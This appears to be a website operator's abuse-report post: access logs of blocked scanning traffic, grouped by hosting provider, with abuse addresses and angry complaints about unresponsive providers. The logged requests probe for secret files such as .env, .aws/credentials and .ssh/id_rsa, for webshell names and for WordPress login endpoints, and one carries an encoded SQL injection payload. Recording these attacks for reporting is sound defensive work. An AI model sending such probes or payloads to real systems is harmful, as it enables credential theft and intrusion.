185.177.72.29 website*x.com – – [24/Aug/2025:01:58:51 +0200] „GET /.env.dev HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:51 +0200] „GET /config/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:51 +0200] „GET /docker/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:51 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:51 +0200] „GET /api/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:51 +0200] „GET /api/settings.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:51 +0200] „GET /api/keys HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:51 +0200] „GET /api/credentials HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:51 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:01:58:51 +0200] „GET /phpinfo.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

MAIL NR. 8 TODAY!
abuse@shajibonline.com.bd,abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,abuse.irt@ptcl.net
AS152462 Shajib Online – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@shajibonline.com.bd
157.15.134.138 website*x.de – – [23/Aug/2025:11:27:43 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0“
Pakistan Telecommuication company limited – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse.irt@ptcl.net – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
39.43.142.240 website*x.de – – [23/Aug/2025:13:46:02 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/10.0.0.0 Safari/537.36“
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /.bod/.ll/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /admin/controller/extension/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /admin/core/kcfinder/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /admin/filemanager/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /admin/js/kcfinder/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /admin/kcfinder/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /administrator/templates/bluestork/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /administrator/templates/hathor/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /administrator/templates/isis/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /adminweb/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /admnin/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /alfacgiapi/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /application/themes/admin/assets/js/kcfinder/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /arquivos/javascript/responsive_filemanager/filemanager/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /asset/filemanager/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /assets/filemanager/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /assets/plugins/kcfinder/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /assets/plugins/tinymce/plugins/filemanager/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /assets/responsive_filemanager/filemanager/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /assets/scripts/filemanager/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /blog/wp-admin/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /blog/wp-includes/fonts/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /catalog/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /cgi-bin/cgi-bin/ HTTP/1.0“ 404 266 „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /ckeditor/kcfinder/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:37 +0200] „GET /ckeditor/plugins/kcfinder/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:38 +0200] „GET /config/autoload/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:38 +0200] „GET /content/ HTTP/1.0“ 403 – „-“ „-“
135.220.171.237 website*x.de – – [23/Aug/2025:13:23:38 +0200] „GET /contents.php/ HTTP/1.0“ 302 – „-“ „-“

MAIL NR. 9 TODAY!
info@fasthosting.net.za,abuse-mail@verizonbusiness.com,abuse@packethub.tech
AS211138 – Private-Hosting di Cipriano oscar – VERY UNSECURE AND IGNORANT PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
info@fasthosting.net.za – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
41.216.188.205 website*x.com – – [23/Aug/2025:16:06:28 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
41.216.188.205 website*x.com – – [23/Aug/2025:16:06:28 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:120.0) Gecko/20100101 Firefox/120.0“
41.216.188.205 website*x.com – – [23/Aug/2025:16:06:28 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0“
41.216.188.205 website*x.com – – [23/Aug/2025:16:06:28 +0200] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
41.216.188.205 website*x.com – – [23/Aug/2025:16:06:28 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15“
41.216.188.205 website*x.com – – [23/Aug/2025:16:06:28 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
AS701 – Verizon Business – VERY UNWANTED PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse-mail@verizonbusiness.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
96.240.148.71 website*x.com – – [23/Aug/2025:17:16:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
AS136787 – PacketHub S.A. – VERY UNWANTED PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@packethub.tech – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:21 +0200] „GET /wp-config.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:21 +0200] „GET /config.yml HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:21 +0200] „GET /web.config HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:21 +0200] „GET /settings.py HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:21 +0200] „GET /secrets.json HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:21 +0200] „GET /_vti_pvt/service.pwd HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:21 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:21 +0200] „GET /config.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:21 +0200] „GET /config.yaml HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:21 +0200] „GET /config.xml HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:22 +0200] „GET /db/schema.rb HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:22 +0200] „GET /config.json HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:22 +0200] „GET /.aws/credentials HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:22 +0200] „GET /docker-compose.yml HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:22 +0200] „GET /.ssh/id_rsa HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:24 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:24 +0200] „GET /phpinfo.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:24 +0200] „GET /.svn/wc.db HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:24 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:24 +0200] „GET /user_secrets.yml HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:24 +0200] „GET /backup.tar.gz HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:24 +0200] „GET /feed HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:24 +0200] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:24 +0200] „GET /etc/ssl/private/server.key HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:24 +0200] „GET /backup.sql HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:28 +0200] „GET /config/production.json HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:28 +0200] „GET /dump.sql HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:28 +0200] „GET /.env.production HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:28 +0200] „GET /server-status HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:28 +0200] „GET /server.key HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:28 +0200] „GET /.ssh/id_ed25519 HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:28 +0200] „GET / HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:28 +0200] „GET /database.sql HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:28 +0200] „GET /wp-admin/setup-config.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
213.232.87.232 website*x.com – – [23/Aug/2025:17:32:28 +0200] „GET /cloud-config.yml HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“

MAIL NR. 10 TODAY!
abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,abuse@trabia.com,abuse@linode.com
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:28 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:28 +0200] „GET /xc.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:30 +0200] „GET /gmo.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:31 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:31 +0200] „GET /ar.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:32 +0200] „GET /we.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:33 +0200] „GET /abcd.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:33 +0200] „GET /modules/mod_simplefileuploadv1.3/elements/filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:33 +0200] „GET /pp.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:34 +0200] „GET /wp.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:35 +0200] „GET /geck.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:35 +0200] „GET /class20.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:36 +0200] „GET /ol.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:36 +0200] „GET /wp-gr.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:37 +0200] „GET /pp.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:37 +0200] „GET /error.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:38 +0200] „GET /wp-gr.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:39 +0200] „GET /build.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:39 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:40 +0200] „GET /class20.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:40 +0200] „GET /size.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:41 +0200] „GET /2x.php HTTP/1.0“ 302 – „-“ „-“
52.185.152.131 website*x.com – – [23/Aug/2025:18:22:42 +0200] „GET /fm.php?p= HTTP/1.0“ 302 – „-“ „-“
AS43289 – Trabia SRL – VERY UNWANTED – REFERRER-SPAM!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@trabia.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
178.17.172.98 website*x.com – – [23/Aug/2025:19:54:31 +0200] „GET / HTTP/1.0“ 403 – „https://skladovka.ua/“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)“
178.17.172.98 website*x.com – – [23/Aug/2025:19:54:31 +0200] „GET / HTTP/1.0“ 403 – „https://skladovka.ua/“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)“
178.17.172.98 website*x.com – – [23/Aug/2025:19:54:31 +0200] „GET / HTTP/1.0“ 403 – „https://skladovka.ua/“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)“
AS63949 – Akamai Connected Cloud – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@linode.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2a01:7e04::2000:b8ff:fe3e:636 website*x.com – – [24/Aug/2025:01:20:14 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
2a01:7e04::2000:b8ff:fe3e:636 website*x.com – – [24/Aug/2025:01:20:14 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
2a01:7e04::2000:b8ff:fe3e:636 website*x.com – – [24/Aug/2025:01:20:15 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
2a01:7e04::2000:b8ff:fe3e:636 website*x.com – – [24/Aug/2025:01:20:15 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
2a01:7e04::2000:b8ff:fe3e:636 website*x.com – – [24/Aug/2025:01:20:15 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15“
2a01:7e04::2000:b8ff:fe3e:636 website*x.com – – [24/Aug/2025:01:20:15 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0“
2a01:7e04::2000:b8ff:fe3e:636 website*x.com – – [24/Aug/2025:01:20:15 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
2a01:7e04::2000:b8ff:fe3e:636 website*x.com – – [24/Aug/2025:01:20:15 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
2a01:7e04::2000:b8ff:fe3e:636 website*x.com – – [24/Aug/2025:01:20:15 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
2a01:7e04::2000:b8ff:fe3e:636 website*x.com – – [24/Aug/2025:01:20:15 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“

SONNTAG, 24.08.25

MAIL NR. 11 TODAY!
abuse@lir.ro,abuse@flarezen.com,IARPOC@Newfold.com,eig-net-team@endurance.com
AS3223 – Voxility LLP – IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@lir.ro
80.96.6.251 website*x.com – – [24/Aug/2025:06:14:33 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0“
AS147181 – Flarezen Ltd. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@flarezen.com
103.174.50.98 website*x.com – – [24/Aug/2025:09:00:04 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
103.174.50.98 website*x.com – – [24/Aug/2025:09:00:05 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0“
AS46606 – Unified Layer – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com,eig-net-team@endurance.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
173.254.31.98 website*x.com – – [24/Aug/2025:09:11:36 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
173.254.31.98 website*x.com – – [24/Aug/2025:09:11:37 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“

MAIL NR. 12 TODAY!
abuse@globaldata-cloud.com,IARPOC@Newfold.com,abuse@oracleemaildelivery.com,abuse@romarg.com
AS42624 – Global-Data System IT Corporation – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@globaldata-cloud.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
185.208.159.167 website*x.com – – [24/Aug/2025:02:19:33 +0200] „GET //wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Ctable%25255fname%252520from%252520information%25255fschema%25252etables%25253B%252500 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
AS31898 – Oracle Corporation – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com,abuse@oracleemaildelivery.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
50.6.4.158 website*x.com – – [24/Aug/2025:02:51:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
50.6.4.158 website*x.com – – [24/Aug/2025:02:51:08 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
AS205275 – ROMARG SRL – IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@romarg.com
89.45.83.89 website*x.com – – [24/Aug/2025:03:12:39 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
89.45.83.89 website*x.com – – [24/Aug/2025:03:12:39 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“

MAIL NR. 13 TODAY!
google-cloud-compliance@google.com, network-abuse@google.com,abuse@reg.ru,anti-spam@chinatelecom.cn
AS396982 – Google LLC – Google-Cloud again and agein EVERY DAY! – VERY UNSECURE NETWORKS!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
35.231.105.247 website*x.com – – [24/Aug/2025:03:03:14 +0200] „HEAD /new.zip HTTP/1.0“ 403 – „-“ „-“
35.231.105.247 website*x.com – – [24/Aug/2025:03:03:14 +0200] „HEAD /data.zip HTTP/1.0“ 403 – „-“ „-“
35.231.105.247 website*x.com – – [24/Aug/2025:03:03:14 +0200] „HEAD /temp.zip HTTP/1.0“ 403 – „-“ „-“
35.231.105.247 website*x.com – – [24/Aug/2025:03:03:14 +0200] „HEAD /old.zip HTTP/1.0“ 403 – „-“ „-“
AS197695 – „Domain names registrar REG.RU“ – RUSSIA IS COMPLETE UNWANTED – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
